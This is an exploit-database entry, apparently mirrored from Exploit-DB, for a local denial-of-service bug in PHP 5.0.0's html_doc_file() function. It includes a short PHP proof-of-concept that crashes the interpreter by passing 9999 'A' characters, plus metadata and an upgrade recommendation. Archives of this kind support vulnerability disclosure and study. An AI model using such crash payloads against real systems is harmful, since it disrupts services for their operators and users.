header-logo
Suggest Exploit
vendor:
PHP
by:
Yakir Wizman
2,6
CVSS
LOW
Denial of Service
400
CWE
Product Name: PHP
Affected Version From: 5.0.0
Affected Version To: 5.0.0
Patch Exists: YES
Related CWE: N/A
CPE: a:php:php:5.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2016

PHP 5.0.0 html_doc_file() Local Denial of Service

This exploit causes a denial of service in PHP 5.0.0 when the html_doc_file() function is passed a string of 9999 'A's. This exploit was tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0. The bug was discovered by Yakir Wizman.

Mitigation:

Upgrade to a version of PHP that is not vulnerable to this exploit.
Source

Exploit-DB raw data:

                        <?php
#############################################################################
## PHP 5.0.0 html_doc_file() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");

$str = str_repeat('A', 9999);
html_doc_file($str);
?>

Navigation

Suggest Exploit

Services By CQR